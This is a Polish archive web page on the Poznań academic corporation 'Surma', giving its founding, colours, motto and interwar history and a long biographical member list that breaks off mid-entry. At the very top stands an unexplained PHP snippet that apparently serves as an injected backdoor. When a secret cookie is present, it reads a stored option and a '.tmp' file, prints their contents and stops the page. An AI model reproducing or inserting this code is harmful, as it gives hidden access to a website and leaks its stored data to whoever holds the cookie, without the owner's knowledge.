if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Surma

Dekiel NN Nazwa:
Związek Akademicki Surma, Korporacja Akademicka “Surma” przy Uniwersytecie Poznańskim; Korporacja Studentów Uniwersytetu Poznańskiego „Surma”
Siedziba:
Poznań
Data powstania:
14 IV 1921 r.
Barwy:
zielony – złoty – czerwony (symbolika barw: nadzieja – braterstwo – Ojczyzna)
Dewiza:
„Deus et Patria” („Bóg i Ojczyzna”)

Rys historyczny

Herb Surmy, 1931 r.

Surma została założona dnia 14 IV 1920 r. pod nazwą Związek Akademicki Surma. Korporacja nawiązywała nazwą i tradycją do powstałego dnia 24 II 1920 r. Akademickiego Towarzystwa “Surma”, związku śpiewaczego, który był pierwszym na Uniwersytecie Poznańskim stowarzyszeniem o charakterze korporacyjnym. Organizacja ta uległa jednak w końcu marca 1921 r. rozwiązaniu, a grupa jej członków pod wpływem K! Polonia i K! Lechia zdecydowała się kontynuować działalność z formie organizacyjnej wzorowanej na istniejących w owym czasie w Poznaniu korporacjach akademickich. Ideologia Surmy streszczała się w dewizie „Deus et Patria”.

Surmita, ok. 1923 r. (?).

Senat Uniwersytetu zatwierdził statut korporacji uchwałą z dnia 24 czerwca 1921 r. Kuratorami Surmy z ramienia uczelni byli: początkowo prof. Romuald Paczkowski, a od 1922 r. prof. Łucjan Kamieński.

Od dnia 6 V 1922 r. Surma była członkiem rzeczywistym Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 4 VI 1921 r.). Kwestia starszeństwa Surmy była przedmiotem wieloletnich sporów z Posnanią oraz Chrobrią, rozstrzygniętych w początkach lat 20-tych w ramach środowiska poznańskiego na korzyść Surmy, a później na szczeblu ogólnokrajowym na korzyść Posnanii oraz Chrobrii.

Surma, Poznań 1923/24 r. (?).

Surma jako trzecia poznańska korporacja (po Lechii oraz Polonii) objęła w 1923 r. przewodniczenie Poznańskiemu Kołu Międzykorporacyjnemu. Dnia 23 IV 1923 r. poświęcony został sztandar korporacji. W tym samym roku (?) powołane zostało Koło Seniorów przemianowane później na Konwent Filistrów. Z Surmy, jako jedynej poznańskiej korporacji, wywodziło się aż czterech prezesów Poznańskiego Koła Międzykorporacyjnego: Edward Geppert (1923 r.), Zygmunt Grząślewicz (1927-1928), Marian Mika (1931/32) oraz Witold Garstka (1938 r.). Zygmunt Grząślewicz, jako jedyny w całym okresie przedwojennym, funkcję tę pełnił trzykrotnie.

Śpiewnik korporacyjny Łucjana Kamieńskiego, 1932 r.

Aktywność Korporacji ukazują jej wydawnictwa, a w szczególności księga pamiątkowa opublikowana z okazji X-lecia w 1931 r. (Marian Mika (red.), “Surma” Korporacja Akademicka przy Uniwersytecie Poznańskim 1921 - 14.IV. - 1931, Poznań 1931) oraz jej kontynuacja wydana jako jednodniówka z okazji XV-lecia Surmy w 1936 r. (Korporacja Studentów Uniwersytetu Poznańskiego Surma. XV. 1921-1936, Poznań 1936). Surma wydała także w 1922 r. oraz w 1932 r. dwa śpiewniki korporacyjne (Robert Mazurkiewicz (oprac.) Pereat tristitia!… Zbiór pieśni akademickich z melodjamy, Poznań 1922 r., Łucjan Kamieński, Nowe Pieśni i Kurdesze Korporacyjne, Poznań 1932 r.). Pierwszy z nich był najbardziej popularnym śpiewnikiem wśród polskich korporacjach akademickich międzywojnia.

Dewizka korporacyjna Zygmunta Grząślewicza, 1936 r.

Przy Korporacji Surma kandydowały w latach 1927-1928 K! Quritia, a w roku akademickim 1932-1933 K! Gedania Posnaniensis. W 1928 r. (?) zawarty został kartel z Quritią, a w 1933 r. z Gedanią Posnaniensis.

Uroczystości XV-lecia Surmy, Poznań 1936 r.

Całkowita ustalona, choć niekompletna imienna lista członków przedwojennej Surmy obejmuje 195 nazwiska, w tym 15 członków honorowych (i kooptowanych).

Brak wiadomości dotyczących powojennej działalności korporacji, choć wiadomo, że w okresie powojennym odbywały się niewielkie spotkania towarzyskie jej członków. W 2007 r. zapadła decyzja o reaktywacji Korporacji, do której doszło dnia 31 V 2008 r. na Komersie LXXXVII-lecia Poznańskiego Koła Międzykorporacyjnego (www.surma.org.pl).

Lista członków

Poniższa, niekompletna lista członków Surmy obejmuje ponad 190 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Marjan Giersberg, (7 września 1887 w Chwaliszewie pow. Odolanów - ) absolwent klasycznego Gimnazjum w Krotoszynie 1904, student agronomii UWr. 1908-10, ppor. rez. 57 Pułku Piechoty, Filister kooptowany Surmy 1926
 2. Maksymilian Hensel, (1880 - 7 października 1943 w Warszawie) s. Walentego i Michaliny, ojciec Witolda (Surma), dr inż., b. wiceprezydent Gniezna, Filister honorowy Surmy 1937, pochowany na warszawskich Powązkach
  Łucjan Kamieński, prawd. 1932 r.

 3. Łucjan Kamieński, (7 stycznia 1885 w Gnieźnie - 29 lipca 1964 w Toruniu) absolwent Gimnazjum we Wrocławiu 1903, student Uniwersytetu w Berlinie oraz Miejskiej Wyższej Szkoły Muzycznej w Berlinie, dr filozofii 1910, wykładowca Konserwatorium Muzycznego w Poznaniu, od 1922 prof. nadzw., założyciel i kierownik Katedry Muzykologii UP, w 1930 zorganizował pierwsze w Polsce Regionalne Archiwum Fonograficzne, prof. zw. 1936, dziekan Wydziału Humanistycznego UP 1938-39, kurator i Filister kooptowany Surmy, pierwszy prezes Koła Filistrów 1922-31, w 1939 aresztowany przez Gestapo pod zarzutem działalności antyniemieckiej, zwolniony dzięki interwencji żony (niemieckiej śpiewaczki), archiwista w Bibliotece Raczyńskich w Poznaniu, w 1941 podpisał niemiecką listę narodową, po wojnie odsunięty od pracy akademickiej osiadł w Toruniu, uczył w Państwowej Średniej Szkole Muzycznej 1949-57, prowadził indywidualne badania nad muzyką ludową Kaszub, odznaczony Krzyżem Oficerskim Orderu Białego Lwa 1930 oraz Złotym Krzyżem Zasługi 1936

 4. Zygmunt Latoszyński, dyrektor Opery Poznańskiej, Filister honorowy Surmy 1937
 5. Mały , ks. proboszcz, członek honorowy Surmy 1922
 6. Karol Mazurkiewicz, (1881-1942) s. Romana i Maria Śmiśniewicz, ksiądz, proboszcz parafii św. Jana, pedagog, Filister honorowy Surmy 1922
 7. Alfred Niziołek, prof., członek honorowy Surmy 1922
 8. Feliks Nowowiejski (senior), (7 lutego 1877 w Barczewie na Warmii - 18 stycznia 1946 w Poznaniu) ojciec Feliksa Marii (Surma), student w Berlinie, Ratyzbonie i Berlinie, kompozytor, dyrygent, pedagog, organista-wirtuoz, organizator życia muzycznego, prowadził działalność pedagogiczną w Krakowie, Berlinie, a od 1919 w Poznaniu, za kompozycje religijne wyróżniony tytułem szambelana papieskiego 1935, skomponował m.in. melodię Roty oraz operę Legenda Bałtyku, Filister honorowy Pomeranii i Surmy, od 1961 w domu rodzinnym w Barczewie mieści się muzeum poświęcone artyście, od 2008 także w Poznaniu działa Salon Muzyczny - Muzeum Feliksa Nowowiejskiego, od 1994 w Poznaniu odbywa się regularny Międzynarodowy Konkurs Organowy im. Feliksa Nowowiejskiego, a od 2002 w Barczewie Międzynarodowy Festiwal Muzyki Chóralnej im. Feliksa Nowowiejskiego, jest patronem licznych instytucji oświatowych i ulic w wielu miastach w Polsce
 9. Władysław Ossowski, (3 listopada 1890 w Targowisku pow. Lubawa - 1940 w Charkowie) s. Andrzeja i Anny z Langów, absolwent Gimnazjum w Iławie, student med. w Królewcu, Gryfii i Würzburgu, dr med., okulista, w I wojnie światowej w armii niemieckiej 1915-18, lekarz w WP 1919-22, m.in. w 63 Pułku Ułanów w wojnie polsko-rosyjskiej 1920, Filister kooptowany Surmy 1927, wiceprezes 1928-32 i prezes 1932-36 Koła Filistrów, kpt. rez. służby zdrowia, przydzielony do 7 Szpitala Okręgowego, zmobilizowany w wojnie obronnej 1939 do szpitala polowego, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Medalem Niepodległości
 10. Pągowski, członek honorowy Surmy
 11. Narcyz Putz, (28 październik 1877 w Sierakowie pow. Międzychód - 5 grudnia 1942 w Dachau) s. Władysława i Józefy z d. Brodniewicz, absolwent Gimnazjum Marii Magdaleny w Poznaniu 1897, student teologii w Poznaniu i Gnieźnie 1897-1901, ksiądz katolicki 1902, proboszcz św. Mikołaja w Ludzisku, parafii pw. Najświętszego Serca Pana Jezusa w Bydgoszczy, parafii św. Wojciecha w Poznaniu, od 1937 kanonik honorowy Kapituły Metropolitarnej w Poznaniu, radny miejski w Bydgoszczy i Poznaniu, Filister kooptowany Surmy 1924, w 1939 aresztowany przez Gestapo i osadzony w Forcie VII w Poznaniu, później więziony w obozie koncentracyjnym w Dachau i Gusen, od 1999 błogosławiony Kościoła Katolickiego
 12. Stanisław Skaziński, ksiądz katolicki, dr filozofii, prof. gimnazjalny, kapelan Chorągwi Wielkopolskiej, proboszcz parafii św. Mikołaja w Lesznie, Filister kooptowany Surmy 1924
 13. Bolesław Szulczewski, dr, członek honorowy Surmy 1922
 14. Bernard Śliwiński, (5 lipca 1883 w Poniecu k. Gostynia - 18 grudnia 1941 w Neubrandenburgu), student prawa w Berlinie i Wrocławiu 1904-07, dr obojga praw UWr., powstaniec wielkopolski, organizator oddziałów powstańczych w rejonie Gostynia, dowódca Grupy “Leszno”, a później w 6 Pułku Strzelców Wielkopolskich, płk rez., prezydent Policji Państwowej w Poznaniu 1921-22, prezydent Bydgoszczy 1922-30, w latach 30-tych adwokat w Poznaniu i prezes Związku Powstańców Wielkopolskich, Filister kooptowany Surmy 1922, w 1939 dowódca pułku w Poznańskiej Brygadzie Obrony Narodowej w Armii “Poznań”, m.in. w bitwie nad Bzurą, w niewoli niemieckiej w Neubrandenburgu, gdzie zginął
 15. Tadeusz Walkowski, (27 kwietnia 1891 w Żółczy pow. Gniezno - 20 lutego 1944 w Tarnowie) s. Michała i Walerii z Florkowskich, absolwent Gimnazjum w Gnieźnie 1910, student malarstwa i med. w Monachium, Kilonii i Lwowie, dr med. UJK 1921, lekarz w armii niemieckiej 1915-18, Powstaniec Wielkopolski, żołnierz WP 1919-21, w dwudziestoleciu międzywojennym lekarz w Poznaniu, artysta malarz, na “Salonie zimowym 1932 r.” w Zachęcie wyróżniony brązowym medalem w 1935 otrzymał nagrodę artystyczną miasta Poznania, Filister kooptowany Surmy 1925, uczestnik wojny obronnej 1939, w 1939 wysiedlony z Poznania do tzw. Generalnej Guberni, odznaczony m.in. Krzyżem Powstańców, Odznaką Orląt, Gwiazdą Wołyńską, Krzyżem Niepodległości, Krzyżem Walecznych

Członkowie rzeczywiści

 1. Paweł Arndt, (16 kwietnia 1905 w Dobrczu w pow. bydgoskim - ) absolwent Gimnazjum w Chojnicach 1923, student Wydziału Prawno-Ekonomicznego UP, c. 1929, akt. 1929-31
 2. Edmund Banach, (22 września 1909 w Mogilnie - ) absolwent Gimnazjum w Gnieźnie 1930, od 1930 student Wydziału Prawno-Ekonomicznego UP, c. 1931
 3. Klemens Barczyński, (4 sierpnia 1910 w Lisewie pow. Chełmno - 1997) absolwent Gimnazjum Klasycznego w Grudziądzu 1930, student i absolwent farmacji UP 1934-38, c. 1935, akt. 1935-36, po studiach pracownik apteki, w tym kierownik 1938-39 i 1945 przy ul. Głogowskiej w Poznaniu, w czasie okupacji w Organizacji Służby Zdrowia ZWZ i “Ojczyźnie”, zaopatrywał w leki i środki opatrunkowe lekarzy współpracujących z tymi organizacjami, po wojnie m.in. od 1945 adiunkt Państwowego Zakładu Higieny w Poznaniu, od 1950 kierownik Pracowni Ogólno-Badawczej, dr farmacji AM w Poznaniu 1950, mgr chemii UP 1953, od 1953 kierownik Oddziału Badania Żywności, a następnie do 1975 kierownik Działu Higieny Żywienia i Żywności Stacji Sanitarno-Epidemiologicznej m. Poznania, p.o. kierownika Zakładu Bromatologii na Wydziale Farmaceutycznym AM w Poznaniu 1961-65, działacz społeczny Polskiego Towarzystwa Higienicznego, m.in. skarbnik, a w latach 1974/75 zastępca przewodniczącego oddziału poznańskiego, rzeczoznawca sądowy, odznaczony m.in. Odznaką Honorową m. Poznania 1968, Srebrną Odznaką Honorową Polskiego Towarzystwa Higienicznego 1971
 4. Józef Bargieł, (12 grudnia 1906 w Starejwsi pow. Brzozów w Małopolsce - ) absolwent Gimnazjum w Inowrocławiu 1925, od 1925 student Wydziału Humanistycznego UP, c. 1925
 5. Leon Bartlikowski, c. ok. 1924, akt. 1924?-26
 6. Felicjan Bartlitz, s. Franciszka i Bronisławy z d. Günther, brat bliźniak Aleksandra (Chrobria), założyciel Surmy
 7. Józef Bieliński, (11 lutego 1905 w Pączewie pow. Starogard - ) absolwent klasycznego Gimnazjum w Chełmnie 1924, student i absolwent prawa UP 1924-28, c. 1924, akt. 1924-28, po studiach aplikant sądowy
 8. Eugeniusz Bieszke, (30 sierpnia 1910 w Tiegenhof k. Gdańska (?) - ) absolwent Gimnazjum Humanistycznego UP 1929, od 1929 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31
 9. Stefan Borowski, założyciel Surmy, akt. 1921-22, wiceprezes sem. zim. 1921/22 (od stycznia) oraz sem. let. 1921/22, olderman sem. let. 1922 (kadencja VI-X 1922)
 10. Edward Borsz, (21 października 1911 w Śmiglu - ) absolwent klasycznego Gimnazjum w Gnieźnie 1929, od 1929 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31
 11. Stefan Brewka, (20 lipca 1912 w Bydgoszczy, - 2 stycznia 1997 w Londynie) absolwent staroklasycznego Gimnazjum w Trzemesznie 1932, od 1932 student Wydziału Prawno-Ekonomicznego UP, c. ok. 1932, akt. 1932?-39, sekretarz sem. let. 1933/34, olderman sem. let. 1938/39 (od lutego 1939), wiceprezes 1938/39 oraz prezes 1939 Bratniej Pomocy Studentów UP, współorganizator poznańskiej pielgrzymki akademickiej na Ślubowanie Jasnogórskie 1936, członek władz SN na wychodźstwie, współzałożyciel Światowego Bydgoszczan
 12. Czesław Bronicki, c. ok. 1931
 13. Alfons Busza, (21 października 1911 w Kobylinie pow. Krotoszyn - ok. 2003/4) brat Bernarda i Władysława II (obaj Surma), absolwent Gimnazjum Humanistycznego im. Jana Kantego w Poznaniu 1929, od 1929 student med. UP, c. 1930, akt. 1930-31, wiceprezes r.a. 1932/33, prezes sem. zim. 1933/34, sekretarz PKM 1932/33, członek Zarządu 1931/32 oraz wiceprezes 1932/33 Koła Medyków, skarbnik Wszechsłowiańskiego Związku Medyków, w czasie wojny lekarz w Edynburgu, po wojnie na emigracji w Stanach Zjednoczonych
 14. Bernard Busza, (17 maja 1908 w Kobylinie pow. Krotoszyn - 1980) brat Alfonsa i Władysława II (obaj Surma), absolwent Gimnazjum Marii Magdaleny w Poznaniu 1927, student i absolwent med. UP 1927-33, c. 1930, akt. 1930-31, chirurg
 15. Edmund Busza, c. ok. 1931
 16. Władysław Busza, (4 maja 1912 w Gostyniu - ) student i absolwent 1937 med. UP, c. ok. 1931, akt. 1931-36, skarbnik sem. zim. 1933/34, chirurg, w 1956 dyrektor Szpitala Rejonownego w Panicach pow. Gostyń
 17. Władysław Busza II, (2 czerwca 1913 w Kobylinie pow. Krotoszyn - 1988) brat Alfonsa i Bernarda (obaj Surma), student i absolwent 1938 farmacji UP, c. 1934, akt. 1934-36, członek Zarządu Koła Farmaceutów 1936/37, po wojnie farmaceuta w Trójmieście
 18. Stanisław Charytoniuk, (25 lipca 1910 w Kronsztadzie w Rosji - ) absolwent Gimnazjum Humanistycznego w Świeciu nad Wisłą 1930, od 1930 student med. UP, c. 1931, [być może wcześniej w Baltii]
 19. Jan Chmarzyński, c. ok. 1931, akt. 1931?-33, sekretarz sem. let. 1932/33

  Ignacy Chojecki, druga poł. lat 30-tych.

 20. Ignacy Chojecki, (1914-1997) prezes sem. let. 1938/39

 21. Ludwik Chojecki, student Wydziału Rolno-Leśnego UP, c. 1935, akt. 1935-36

  Stefan Chojecki, 1923/24 r.

 22. Stefan Chojecki, (27 sierpnia 1901 w Chorzempowie k. Międzychodu - 1982) absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu 1921, ochotnik WP 1919-20, student Wydziału Prawno-Ekonomicznego UP 1921-25, c. 1921, akt. 1921-28, wiceprezes sem. let. 1922/23 i r.a. 1926/27, prezes sem. let. 1924/25 i r.a. 1925/26, olderman r.a. 1923/24, sem. zim. 1924/25, r.a. 1927/28, delegat na III, IV, V, VII Zjazdy ZPKA, marszałek VII Zjazdu ZPKA, prawnik

 23. Franciszek Ciesielski, c. 1921
 24. Eugeniusz de Cordé, c. ok. 1929
 25. Franciszek Cyrok, (4 listopada 1904 w Januszkowie pod Żninem - ) absolwent klasycznego Gimnazjum w Trzemesznie, student i absolwent med. UP 1924-45, c. 1924, sekretarz r.a. 1926/27 (od lutego 1927) oraz V 1927, psychiatra
 26. Kazimierz Czajkowski, (6 sierpnia 1908 w Wiązowicach pow. Sandomierz - ) absolwent Gimnazjum Matematyczno-Przyrodniczego w Łodzi 1929, od 1929 student Wydziału Rolno-Leśnego UP, c. 1930, sekretarz r.a. 1932/33
 27. Alfred Czarnota, (10 lutego 1911 w Kłecku pow. Gniezno - ) absolwent Gimnazjum w Gnieźnie 1929, od 1929 student Wydziału Matematyczno-Przyrodniczego UP, c. 1930, akt. 1930-31
 28. Ćwielecki, (?), wiceolderman 1930/31
 29. Eryk Dąbrowski, c. 1921/22
 30. Konrad Drecki, założyciel Surmy [prawd. tożsamy z Konrad Drecki (26 listopada 1891 w Miłosławiu pow. Września - 27 października 1957) s. Franciszka i Kazimiery z Szymańskich, brat Edmunda (Chrobria), wuj Zygmunta Kapałczyńskiego (Chrobria), praktykant w aptece w Kościanie 1910-13, w czasie I wojny światowej powołany do armii niemieckiej, ranny w walkach na froncie zachodnim, praktykant w aptekach w Niemczech, po wojnie student i absolwent farmacji UP 1919-21, założyciel Lechii, od 1926 właściciel apteki, w czasie okupacji w Krakowie]
 31. Marjan Drybański, c. ok. 1925, akt. ok. 1925-27, sekretarz r.a. 1926/27 (od grudnia 1926)
 32. Adolf Duszyński, (17 września 1901 w Zelgoszczy pow. Stargard - 4 maja 1926) absolwent Gimnazjum w Stargardzie 1921, ochotnik WP 1919-20, od 1921 student Wydziału Prawno-Ekonomicznego UP, c. 1922
 33. Władysław Fiebig, (2 czerwca 1904 w Strzelnie - ) absolwent Gimnazjum w Krotoszynie 1923, student i absolwent prawa UP, c. 1924, akt. 1924-28, po studiach aplikant sądowy
 34. Witold Garstka, (ok. 1915 - ) c. ok. 1934, akt. 1934?-38, sekretarz r.a. 1935/36, wiceprezes sem. let. 1936/37, skarbnik 1937 i prezes 1938 Poznańskiego Koła Międzykorporacyjnego
 35. Józef Kazimierz Gayda, (19 marca 1901 w Wejherowie - 23 marca 1926 w Bydgoszczy) brat stryjeczny Józefa (Surma) i Leona (Pomerania), student i absolwent 1924 prawa UP, członek Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1921-25, wiceprezes sem. let. 1921/22 (od marca 1922), skarbnik sem. let. 1921/22 (kadencja VI-X 1922), olderman sem. zim. 1922/23, pochowany w Tucholi
 36. Stanisław Gawrych, (5 maja 1904 w Gnieźnie - ) absolwent Gimnazjum w Gnieźnie 1923, od 1923 student Wydziału Prawno-Ekonomicznego UP, c. 1925 (?)

  Edward Geppert, 1923/24 r.

 37. Edward Geppert, (16 lipca 1901 w Sapowicach pow. Poznań Zachód - 1982) absolwent Gimnazjum w Inowrocławiu 1919, ochotnik WP 1919-21, student Wydziału Prawno-Ekonomicznego UP, c. 1922, akt. 1922-28, skarbnik sem. zim. 1922/23, prezes sem. let. 1922/23 i r.a. 1923/24, wiceprezes sem. zim. i sem. let. 1924/25, prezes PKM 1923, delegat na III Zjazd ZPKA, sekretarz 1928 oraz prezes 1939 Koła Filistrów

 38. Jan Glaza, (19 października 1903 w Czersku pow. Chojnice - ) brat (?) Romana (Surma), absolwent Gimnazjum w Świeciu 1922, od 1922 student Wydziału Prawno-Ekonomicznego, student i absolwent Wydziału Humanistycznego UP, c. 1923, akt. 1923-26, wiceprezes sem. let. 1925/26 (od maja 1925)
 39. Roman Glaza, (28 lutego 1907 w Czersku pow. Chojnice - ) brat (?) Jana (Surma), absolwent Gimnazjum w Świeciu 1926, od 1926 student Wydziału Prawno-Ekonomicznego UP, c. 1926, akt. 1926-29, sekretarz sem. zim. oraz sem. let. 1928/29
 40. Bernard Gmerek, (8 maja 1907 w Pszczewie pow. Międzyrzecze - ) absolwent Gimnazjum w Świeciu 1928, od 1929 student med. UP, c. 1930, akt. 1930-32, sekretarz r.a. 1931/32, lekarz, pchor. rez.
 41. Franciszek Goderski, założyciel Surmy
 42. Stefan Gospodarek, (6 sierpnia 1908 w Krotoszynie - ) student i absolwent Gimnazjum im. H. Kołłątaja w Krotoszynie, od 1928 student Wydziału Matematyczno-Przyrodniczego UP, c. 1929, akt. 1929-32, sekretarz sem. let. 1929/30 (kadencja V-X 1930) i r.a. 1930/31, olderman r.a. 1930/31 (od maja 1931), olderman r.a. 1931/32, przewodniczący Komisji Rewizyjnej 1932/33 Akademickiego Koła Krotoszyniaków
 43. Marian Górski, wicerpezes sem. let. 1938/39
 44. Anzelm Górywoda, (20 kwietnia 1907 w Zabrzu - ) absolwent Gimnazjum Matematyczno-Przyrodniczego w Królewskiej Hucie 1926, od 1927 student Wydziału Prawno-Ekonomicznego UP, c. 1929, akt. 1929-31, wiceprezes r.a. 1930/31

  Zygmunt Grząślewicz, 1923/24 r.

 45. Zygmunt Grząślewicz, (4 marca 1902 w Kostrzynie pow. Środa Wlkp. - 1958) absolwent Gimnazjum w Inowrocławiu 1920, student Wydziału Prawno-Ekonomicznego UP, członek Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1921-28, wiceprezes r.a. 1923/24, prezes sem. zim. 1924/25, olderman r.a. 1925/26 oraz r.a. 1926/27 (do lutego 1927), kurator Gedanii Posnaniensis i Quiritii, prezes PKM 1927-28, delegat na IV, V i VII Zjazd ZPKA, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, wiceprezes 1931-36 i prezes 1937 Koła Filistrów, pchor. rez. piechoty

 46. Zdzisław Hasiński, c. ok. 1922, akt. 1922?-24, sekretarz r.a. 1923/24, członek Zarządu Koła Poznańskiego MW
 47. Witold Hensel, (29 marca 1917 w Gnieźnie - 22 listopada 2008 w Warszawie) s. Maksymiliana i Marianny, student historii UP, c. 1934 Magna-Polonia, później w Surmie, archeolog, prof. UP 1951-56, od 1954 prof. UW, od 1954 dyrektor Instytutu Historii Kultury Materialnej PAN w Warszawie, współorganizator i pierwszy Prezes Unii Archeologii Słowiańskiej 1965-67, od 1965 członek rzeczywisty PAN, poseł na Sejm PRL IX kadencji 1985-89 z ramienia Stronnictwa Demokratycznego, doctor honoris causa UAM 1986, w 2007 otrzymał medal “Lux et Laus” przyznawany przez Stały Komitet Mediewistów Polskich za wyjątkowe zasługi w badaniach historycznych, pochowany na warszawskich Powązkach
 48. Edward Herwich, założyciel Surmy, olderman sem. let. 1920/21
 49. Mieczysław Hubert, (28 kwietnia 1911 w Brusach pow. Chojnice - 20 września 1939) z Jarocina, absolwent Gimnazjum Klasycznego im. Tadeusza Kościuszki w Jarocinie 1930, od 1930 student Wydziału Prawno-Ekonomicznego UP, c. 1930 Surma, akt. 1930-31, później w Masovii, w wojnie obronnej 1939 poległ w obronie Warszawy, pochowany na Wojskowych Powązkach w Warszawie
 50. Władysław Iwaszek, (26 lipca 1909 w Czerlanach - ) absolwent Gimnazjum w Trzemesznie 1927, od 1927/28 student Wydziału Prawno-Ekonomicznego UP, c. 1928, członek Zarządu Akademickiego Koła Trzemesznian 1931/32
 51. Florian Janicki, (30 kwietnia 1907 w Poznaniu - ) absolwent Gimnazjum im. J. Wybickiego w Śremie 1928, od 1929 student WSH, c. 1929, pchor. rez. piechoty
 52. Michał Jankiewicz, (1900 w Gostyniu - 1927) brat Wojciecha (Chrobria), założyciel, pierwszy wiceprezes, a następnie prezes Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1920-21, sekretarz sem. let. 1920/21, przeszedł do Chrobrii, prezes 1924/25, prezes Poznańskiego Koła Międzykorporacyjnego 1924/25, redaktor działu “Korporant Polski” w “Akademiku”, prezes Młodzieży Wszechpolskiej 1922/23, prawnik, sędzia powiatowy w Pobiedziskach
 53. Gabriel Jasiński, (15 lutego 1908 w Mogilnie - ) absolwent klasycznego Gimnazjum w Mogilnie 1927, student Wydziału Prawno-Ekonomicznego UP 1927-28, student WSH 1928/29, od 1930/31 student Instytutu Dentystycznego w Warszawie, c. 1927, akt. 1927-31, skarbnik sem. let. 1928/29
 54. Kazimierz Jax, (9 lutego 1907 we Wrocławiu - 1947) absolwent Gimnazjum w Gnieźnie 1926, od 1926, student med. UP, c. 1927, akt. 1927-31, olderman sem. let. 1929/30 (kadencja V-X 1930), prezes Akademickiego Koła Gnieźnian 1930/31

  Alfred Jesionowski, sprzed listopada 1927 r.

 55. Alfred Hubert Jesionowski, (27 stycznia 1902 w Mogilnie - prawd. zimą/wczesną wiosną 1945) s. Wojciecha (nauczyciela) i Marii z d. Mensch, absolwent Gimnazjum Państwowego w Inowrocławiu, student romanistyki, polonistyki i germanistyki na Wydziale Humanistycznym UP, ochotnik w wojnie polsko-bolszewickiej 1920 w randze szeregowiec w 2 kompanii 57. pułku piechoty WP, zaangażowany w akcję plebiscytową na Śląsku, członek Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1921-31, olderman, a od stycznia sekretarz sem. zim. 1921/22, sekretarz sem. let. 1921/22, delegat na III Zjazd ZPKA, członek Zarządu Koła Poznańskiego MW, działacz narodowy, po studiach prof. gimnazjalny w Lublińcu 1925-32, Mikołowie 1932, Mysłowicach 1938-39, pedagog, historyk literatury, publicysta „„Prosto z Mostu”, „Gazeta Siemianowicka”, „Młodzież Powstańcza”, „Polska Zachodnia”, „Powstaniec”, „Zarani Śląskie”, „A.B.C”, poznańska „Kultura”, „Kurier Poznański”, „Myśl Narodowa”, „Wici Wielkopolskie”, prelegent Rozgłośni Katowice Polskiego Radia od ok.1937-39, współpracował w Instytutem Śląskim i Instytutem Bałtyckim, w czasie wojny tłumacza w Zakładzie Ubezpieczeń Społecznych w Krakowie 1941-44, w czasie wojny w konspiracyjnej organizacji „Ojczyzna”, członek Sekcji Zachodniej Departamentu Informacji i Pracy Delegatury Rządu RP na Kraj, od 1943 kierownik placówki krakowskiej „Si” i „Pb”, uczestnik akcji N (propagandy dywersyjnej szerzonej przez Niemców), w tym kierownik okręgu 1931-32, ps. „Szymon”, „Dr Szymon”, kryptonim „310”, działał także w tajnym nauczaniu, aresztowany przez gestapo 1 marca 1944, więziony w areszcie śledczym w Krakowie, a następnie w Katowicach, tuż przed wkroczeniem Armii Czerwonej do Katowic wysłany do jednego z obozów, być może filii Gross-Rosen, podobno ostatni raz widziany w 1945 w Bloku nr 2 w AL Fünfteichen (dzisiejsze Miłoszyce) w pobliżu Wrocławia, dalsze losy i data śmierci nieznana, odznaczony m.in. brązowym medalem za długoletnią służbę (1933 ?), srebrnym Krzyżem Zasługi (1938 ?), wyróżniony srebrnym wawrzynem Akademii Literatury (1939), w 2022 ukazał się w Wydawnictwie Arcana wybór pism Alfreda Jesionowskiego „Przymierze z książką. Krytyka literacka, publicystyka i proza z lat 1929-1945” (red. O. Płaszczewskiej, M. Urbanowskiego), nie ma grobu, tabliczka pamiątkowa na grobie w Inowrocławiu oraz na grobie żony Łucji Jesionowskiej na Cmentarzu Grębałów w Krakowie [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuczki Olgi Płaszczewskiej]

 56. Sylwester Jaskulski, student chemii UP, c. 1934, akt. 1934-36
 57. Józef Józefczak, c. ok. 1922, akt. 1922?-23, olderman sem. let. 1922/23
 58. Henryk Kaszyński, (6 stycznia 1905 w Lubczy w pow. żnińskim - ) absolwent Gimnazjum w Gnieźnie 1925, od 1925 student Wydziału Rolno-Leśnego UP, c. 1925, akt. 1925-31
 59. Jan Kaszyński, (15 grudnia 1911 w Lubczu pow. Żnin - 25 kwietnia 1986) s. Leona i Anny z Olejniczaków, absolwent klasycznego Gimnazjum im. Bolesława Chrobrego w Gnieźnie 1930, student i absolwent med. UP 1930-37, c. 1931, odbył służbę wojskową w Szpitalu Psychiatrycznym w Drewnicy k/Warszawy 1937-38, gdzie pełnił funkcję lekarza pułkowego, po odbyciu służby do czerwca 1939 pracował w Szpitalu Psychiatrycznym w Drewnicy k. Warszawy, zmobilizowany 19 sierpnia 1939 do Szpitala VII Okręgowego w Poznaniu, gdzie został wzięty do niewoli niemieckiej, sprawował opiekę lekarską w obozach jenieckich w Żychlinie, Kutnie, Sieradzu, a następnie w obozach na terenie Niemiec, po wyzwoleniu przez wojska amerykańskiej w kwietniu 1945 pracował w obozach dla wysiedleńców na terenie Westfalii, w lipcu 1946 wrócił do kraju i podjął pracę lekarza oddziału chirurgicznego w szpitalu w Sieradzu, dyrektor szpitala 1954-56, od 1956 ordynator oddziałów septycznego i chirurgii dziecięcej, a chirurgii ogólnej 1965-77, od 1978 do śmierci kierownik poradni chirurgicznej, przewodniczący Towarzystwa Lekarskiego na powiat sieradzki i wieluński, przez trzy kadencje przewodniczący Rady Miejskiej w Sieradzu, inspektor powiatowy ds. chirurgi, odznaczony, Krzyżem Kawalerskim OOP, Medalem za Udział w Wojnie Obronnej 1939, Medalem Zasłużony 